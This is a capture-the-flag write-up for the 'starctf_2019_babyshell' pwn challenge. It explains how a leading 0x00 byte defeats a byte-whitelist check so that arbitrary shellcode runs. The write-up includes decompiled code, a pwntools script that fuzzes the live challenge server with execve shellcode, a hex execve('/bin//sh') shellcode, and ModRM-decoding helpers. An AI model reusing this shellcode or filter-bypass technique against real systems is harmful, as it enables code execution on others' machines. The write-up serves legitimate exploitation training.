
buuctf starctf_2019_babyshell

Author: doinb1517 | Published 2024-08-26 15:03 | Read 0 times

While working through challenges today I came across an interesting one: you submit shellcode, it is executed only if it passes a check, and the usual approach is to piece the shellcode together out of the bytes the check allows. There is, however, a neat trick floating around online that bypasses the check altogether, after which pwntools' built-in shellcode is enough to get a shell. This is a short note on that trick.

checksec

checksec starctf_2019_babyshell
[*] '/home/fuzz/Desktop/ctf/starctf_2019_babyshell'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The vulnerable function

main looks like this:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  _BYTE *buf; // [rsp+0h] [rbp-10h]

  sub_4007F8();
  buf = mmap(0LL, 0x1000uLL, 7, 34, 0, 0LL);
  puts("give me shellcode, plz:");
  read(0, buf, 0x200uLL);
  if ( !(unsigned int)sub_400786(buf) )
  {
    printf("wrong shellcode!");
    exit(0);
  }
  ((void (*)(void))buf)();
  return 0LL;
}

sub_4007F8() only does initialisation and can be ignored. Note what main does with the buffer: it comes from mmap with prot 7 (PROT_READ|PROT_WRITE|PROT_EXEC) and flags 34 (MAP_PRIVATE|MAP_ANONYMOUS), so NX is irrelevant; read() copies at most 0x200 bytes into the 0x1000-byte page (no overflow), and whatever passes sub_400786 is called directly. sub_400786 checks that every byte of the shellcode is one of the characters of a fixed string:

__int64 __fastcall sub_400786(_BYTE *a1)
{
  const char *i; // [rsp+18h] [rbp-10h]

  while ( *a1 )
  {
    for ( i = aZzjLovesShellC; *i && *i != *a1; ++i )// ZZJ loves shell_code,and here is a gift:
      ;
    if ( !*i )
      return 0LL;
    ++a1;
  }
  return 1LL;
}

Writeup

Following the article "汇编语言中0x00的妙用" (roughly "the clever use of 0x00 in assembly", link below), a 0x00 byte can be used to bypass the check entirely. sub_400786 walks the buffer with `while (*a1)`, i.e. it treats the input as a C string and stops at the first NUL, whereas read() copied the whole payload and the CPU executes straight past a NUL. What we need, then, is an instruction whose encoding starts with 0x00, forms one complete instruction so that the shellcode placed right after it stays aligned, and is harmless when executed.

link:https://blog.csdn.net/A951860555/article/details/120043354
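As an added illustration (my code, not the post's or the challenge's), here is a Python model of sub_400786 together with the bypass described above. GIFT is the allowed-character string as IDA shows it in the comment on aZzjLovesShellC; the shellcode is a standard hand-assembled execve("/bin//sh") stub embedded as constructed sample input so the example runs without pwntools, and the function names are my own.

```python
# Added example: a Python model of sub_400786 and of the 0x00 bypass.
# GIFT is the allowed-character string as IDA shows it in the decompiler comment.
GIFT = b"ZZJ loves shell_code,and here is a gift:"

# Constructed sample input: a standard 23-byte x86-64 execve("/bin//sh")
# shellcode, hand-assembled so the example runs without pwntools. It contains
# no 0x00 byte and its first byte (0x48, REX.W) is not in GIFT.
SHELLCODE = bytes.fromhex(
    "4831f6"                  # xor  rsi, rsi        argv = NULL
    "56"                      # push rsi             NUL terminator for the path
    "48bf2f62696e2f2f7368"    # movabs rdi, "/bin//sh"
    "57"                      # push rdi
    "54"                      # push rsp
    "5f"                      # pop  rdi             rdi -> "/bin//sh"
    "6a3b"                    # push 0x3b
    "58"                      # pop  rax             rax = SYS_execve
    "99"                      # cdq                  rdx = 0 (envp)
    "0f05"                    # syscall
)


def inspected_bytes(payload):
    """The bytes sub_400786 actually examines: everything before the first NUL.

    read() does not NUL-terminate, but buf is a freshly mmap'd anonymous page
    and therefore zero-filled, so a payload without any 0x00 byte is terminated
    by the page itself.
    """
    end = payload.find(b"\x00")
    return payload if end < 0 else payload[:end]


def check(payload):
    """Model of sub_400786: True (accept) iff every inspected byte is in GIFT."""
    return all(b in GIFT for b in inspected_bytes(payload))


def first_rejected(payload):
    """(offset, value) of the byte that makes the check fail, or None if it passes."""
    for i, b in enumerate(inspected_bytes(payload)):
        if b not in GIFT:
            return i, b
    return None


def bypass(shellcode, prefix=b"\x00\x42\x00"):
    """Prepend a prefix that starts with 0x00 so the check stops before reading
    the shellcode. The prefix must decode to one complete, harmless instruction;
    00 42 00 is `add BYTE PTR [rdx+0x0], al` and the fuzz runs below list alternatives.
    """
    return prefix + shellcode


if __name__ == "__main__":
    print("raw shellcode accepted:", check(SHELLCODE), first_rejected(SHELLCODE))
    print("prefixed shellcode accepted:", check(bypass(SHELLCODE)),
          "bytes inspected:", inspected_bytes(bypass(SHELLCODE)))
    print("all-allowed payload accepted:", check(b"ZZJ loves shell_code"))
```

The raw shellcode is rejected at offset 0 (0x48 is not in the gift string); with the three-byte prefix the check inspects zero bytes and accepts anything that follows.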

The method used there is to find usable opcodes with `pwn disasm`. The bytes `00 42 00` decode as a single three-byte instruction, so shellcode appended directly after them starts on an instruction boundary; `004200` is clearly not the only option:

pwn disasm -c amd64 004200
   0:    00 42 00                 add    BYTE PTR [rdx+0x0],  al

We can fuzz the service to find out which second bytes actually work, using the script below. Each candidate prefix `00 XX` is followed by an execve("/bin/ls") shellcode: if a directory listing (which contains `flag`) comes back, the prefix decoded to a harmless instruction and the shellcode ran; if the target crashed, the connection drops.

from pwn import *
import time

context.arch = "amd64"
# context(log_level='debug', arch='amd64', os='linux')
HOST, PORT = 'node5.buuoj.cn', 27030
success_list = []

for first_byte in range(0x01, 0x100):
    p = remote(HOST, PORT)          # one fresh connection per candidate
    try:
        # candidate prefix 00 XX, then a shellcode that lists / if it runs
        pay = bytes([0x00, first_byte]) + asm(shellcraft.execve("/bin/ls"))
        p.sendafter(b'plz:', pay)
        time.sleep(0.5)
        data2 = p.recvlines(10, timeout=3)
        print(f'data:{data2}')
        # a listing containing "flag" means the prefix was harmless
        if any(b'flag' in line for line in data2):
            print(f'success:{hex(first_byte)}')
            success_list.append(hex(first_byte))
    except Exception:
        pass                        # the prefix crashed the target; try the next byte
    finally:
        p.close()

print(f'success_list:{success_list}')

This gives the output below. One caveat about these numbers: the run was made with a version of the loop that created the connection only before the loop and in the except branch. After a successful candidate the tube was closed, so the next iteration's sendafter raised on the closed tube and merely reconnected, and that byte was never tested. That is why only every other value appears from 0xc0 upward (0xc1, `add cl, al`, is just as harmless as 0xc0, `add al, al`).

[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc0
[*] Closed connection to node5.buuoj.cn port 25948
[+] Opening connection to node5.buuoj.cn on port 25948: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0xc2
[*] Closed connection to node5.buuoj.cn port 25948
(... the same four lines repeat for 0xc4, 0xc6, ... up to 0xfe; the full list follows ...)

success_list:['0x2', '0x6', '0xa', '0xe', '0x12', '0x16', '0x1a', '0x1e', '0x22', '0x26', '0x2a', '0x2e', '0x32', '0x36', '0x3a', '0x3e', '0xc0', '0xc2', '0xc4', '0xc6', '0xc8', '0xca', '0xcc', '0xce', '0xd0', '0xd2', '0xd4', '0xd6', '0xd8', '0xda', '0xdc', '0xde', '0xe0', '0xe2', '0xe4', '0xe6', '0xe8', '0xea', '0xec', '0xee', '0xf0', '0xf2', '0xf4', '0xf6', '0xf8', '0xfa', '0xfc', '0xfe']

Let's also try three-byte prefixes `00 XX 00`, by changing the payload line to:

pay=bytes([0x00,first_byte, 0x00]) + asm(shellcraft.execve("/bin/ls"))

Result:

data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x42
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x45
[+] Opening connection to node5.buuoj.cn on port 27030: Done
data:[b'', b'bin', b'boot', b'dev', b'etc', b'flag', b'flag.txt', b'home', b'lib', b'lib32']
success:0x46
(... same pattern up to 0x7f; an "Opening connection" line with no data line after it is a candidate for which no listing came back, i.e. the target crashed ...)

Successful second bytes for the three-byte prefix 00 XX 00:
0x42, 0x45, 0x46, 0x47, 0x4a, 0x4d, 0x4e, 0x4f, 0x52, 0x55, 0x56, 0x57, 0x5a, 0x5d, 0x5e, 0x5f, 0x62, 0x65, 0x66, 0x67, 0x6a, 0x6d, 0x6e, 0x6f, 0x72, 0x75, 0x76, 0x77, 0x7a, 0x7d, 0x7e, 0x7f

That is every byte in 0x40..0x7f whose low three bits are 010, 101, 110 or 111: with mod = 01 these are the ModRM encodings of [rdx+disp8], [rbp+disp8], [rsi+disp8] and [rdi+disp8], and the trailing 0x00 is the disp8. Encodings with rm = 100 need a SIB byte and would consume the first byte of the shellcode, which is why 0x44, 0x4c, ... never succeed.
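The fuzz results can be explained offline, without touching the service: the byte after 0x00 is the ModRM byte of `add r/m8, r8`, and its mod and rm fields decide whether the instruction touches memory, which register it uses as base, and how many more bytes it needs. The following added example (my code, not the post's) decodes that byte, checks the two result lists above against the encoding, and reproduces the three-byte list exactly. The assumption that rdx, rbp, rsi and rdi hold writable pointers when buf() is called is taken from the fuzz results themselves (those are the only bases that ever succeeded; the post does not show the disassembly of main), not from the binary.

```python
# Added example: decode the ModRM byte that follows opcode 0x00 (add r/m8, r8)
# and use it to explain the fuzz results above. No pwntools needed.

REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
DISP_BYTES = {0: 0, 1: 1, 2: 4}          # displacement size implied by mod = 00 / 01 / 10
DISP_TEXT = {0: "", 1: "+disp8", 2: "+disp32"}

# Base registers that the fuzz runs above show to hold writable pointers when
# buf() is called. This is an inference from the results, not something the
# post verifies in the disassembly.
WRITABLE_BASES = ("rdx", "rbp", "rsi", "rdi")

# Successful second bytes reported by the two fuzz runs above (copied from the post).
FUZZ_2BYTE_OK = [0x02, 0x06, 0x0a, 0x0e, 0x12, 0x16, 0x1a, 0x1e,
                 0x22, 0x26, 0x2a, 0x2e, 0x32, 0x36, 0x3a, 0x3e] + list(range(0xc0, 0x100, 2))
FUZZ_3BYTE_OK = [0x42, 0x45, 0x46, 0x47, 0x4a, 0x4d, 0x4e, 0x4f, 0x52, 0x55, 0x56, 0x57,
                 0x5a, 0x5d, 0x5e, 0x5f, 0x62, 0x65, 0x66, 0x67, 0x6a, 0x6d, 0x6e, 0x6f,
                 0x72, 0x75, 0x76, 0x77, 0x7a, 0x7d, 0x7e, 0x7f]


def decode_add_rm8(modrm):
    """Decode `00 <modrm>` in 64-bit mode (no REX prefix).

    Returns (text, form, base, extra): `form` is reg / mem / sib / rip, `base`
    the 64-bit base register for the mem form, and `extra` the minimum number
    of bytes the instruction needs after the ModRM byte. Those extra bytes are
    taken from whatever follows in the payload, i.e. from the shellcode.
    """
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    src = REG8[reg]
    if mod == 3:                                   # register form: no memory access at all
        return f"add {REG8[rm]}, {src}", "reg", None, 0
    disp = DISP_TEXT[mod]
    if rm == 4:                                    # SIB byte follows (plus disp32 if SIB.base == 101 and mod == 00)
        return f"add BYTE PTR [sib{disp}], {src}", "sib", None, 1 + DISP_BYTES[mod]
    if mod == 0 and rm == 5:                       # RIP-relative with a 4-byte displacement
        return f"add BYTE PTR [rip+disp32], {src}", "rip", None, 4
    base = REG64[rm]
    return f"add BYTE PTR [{base}{disp}], {src}", "mem", base, DISP_BYTES[mod]


def prefix_is_self_contained(prefix):
    """True if prefix (00 XX ...) is exactly one complete instruction.

    sub_400786 stops at the leading 0x00, but the CPU sees the prefix followed
    directly by the shellcode: a prefix shorter than its own instruction would
    swallow the shellcode's first byte(s); a longer one leaves stray bytes that
    decode as a second instruction.
    """
    extra = decode_add_rm8(prefix[1])[3]
    return len(prefix) == 2 + extra


def summarize(ok_bytes, prefix_len):
    """Operand forms and base registers used by a list of successful ModRM bytes."""
    forms, bases = set(), set()
    for b in ok_bytes:
        text, form, base, extra = decode_add_rm8(b)
        if 2 + extra != prefix_len:
            raise ValueError(f"{b:#04x} ({text}) is not a {prefix_len}-byte instruction")
        forms.add(form)
        if base is not None:
            bases.add(base)
    return forms, bases


def candidate_prefixes(length, bases_ok=WRITABLE_BASES):
    """Offline pre-filter: every 00 XX [00 ...] prefix of `length` bytes that is a
    complete instruction and either touches no memory or uses a base register
    from bases_ok. Displacement bytes are zero so the access stays at [base]."""
    out = []
    for modrm in range(0x100):
        text, form, base, extra = decode_add_rm8(modrm)
        if 2 + extra != length:
            continue
        if form == "reg" or (form == "mem" and base in bases_ok):
            out.append(bytes([0x00, modrm]) + b"\x00" * extra)
    return out


if __name__ == "__main__":
    for p in (b"\x00\x42\x00", b"\x00\xc0", b"\x00\x42", b"\x00\x04"):
        print(p.hex(), decode_add_rm8(p[1])[0],
              "complete" if prefix_is_self_contained(p) else "incomplete")
    print("2-byte run:", summarize(FUZZ_2BYTE_OK, 2))
    print("3-byte run:", summarize(FUZZ_3BYTE_OK, 3))
    print("decoder reproduces the 3-byte list:",
          candidate_prefixes(3) == [bytes([0, b, 0]) for b in FUZZ_3BYTE_OK])
```

candidate_prefixes(3) returns exactly the 32 bytes found by the three-byte run. candidate_prefixes(2) additionally returns the odd register forms (0xc1 `add cl, al`, 0xc3, ...) and the [rdi] forms 0x07, 0x0f, ... that the two-byte run never tested; forms needing a SIB byte (rm = 100) or a RIP-relative disp32 (mod = 00, rm = 101) are excluded because they would consume the leading bytes of the shellcode. Whichever prefix is used, it executes before the shellcode sets up its own registers, so an `add` with al into a register or into the buffer itself changes nothing the shellcode depends on.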

Original title: buuctf starctf_2019_babyshell

Original link: https://www.haomeiwen.com/subject/sdvurdtx.html